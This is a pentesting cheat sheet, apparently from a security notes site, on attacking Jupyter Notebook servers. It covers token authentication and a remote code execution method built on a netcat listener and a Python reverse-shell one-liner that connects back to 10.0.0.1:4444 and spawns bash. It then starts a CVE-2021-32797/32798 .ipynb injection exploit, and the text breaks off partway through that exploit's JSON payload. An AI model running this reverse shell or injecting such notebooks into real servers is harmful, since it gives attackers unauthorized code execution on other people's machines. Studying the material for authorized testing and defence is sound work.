# Jupyter Notebook Pentesting
Jupyter notebook is a web-based interactive computing platform. It’s often used for machine learning, data science, etc. It runs locally at 127.0.0.1:8888 by default.
### Run Notebook Server Locally
```shellscript
# For Jupyterlab (more advanced than notebook)
pip install jupyterlab
jupyter-lab
# Specify the token
jupyter-lab --NotebookApp.token=abcdef...
# For Notebook (classic)
pip install notebook
jupyter notebook
# Specify the token
jupyter notebook --NotebookApp.token=abcdef...
```
After that, we can access to `http://127.0.0.1:8888/` in browser.
### Authorization with Token
Reference:
If we have the token for Jupyter notebook server, we can authorize it by adding the token in the “Authorization” HTTP header.
```shellscript
Authorization: token abcdef...
```
Or we can also add the token to URL parameter.
```shellscript
https://my-notebook/tree/?token=abcdef...
```
Or directly input the login form.
### Common Directories
```shellscript
/api/kernelspecs
```
### Remote Code Execution (RCE)
If the target machine opens the Jupyter notebook server then we can access to it from outside, we can simply execute arbitrary Python script in notebook. In short, we can get a shell by reverse shell!\
First off, start a listener in local machine.
```shellscript
nc -lvnp 4444
```
After that, open some **`.ipynb`** file in Jupyter notebook top page, then input the following script and run.
```shellscript
import socket,os,pty;s=socket.socket();s.connect(("10.0.0.1", 4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")
```
We should get a shell in local terminal.
### .ipynb RCE (**CVE-2021-32797, CVE-2021-32798)**
Reference:
We can inject arbitrary code in `.ipynb` file. Create the following file e.g. “exploit.ipynb” then upload it to Jupyter Notebook directory.
* **Jupyter Notebook**
```shellscript
{
"cells": [
{
"cell_type": "code",
"execution_count": 0,
"metadata": {},
"outputs": [
{
"data": {
"text/html": [
"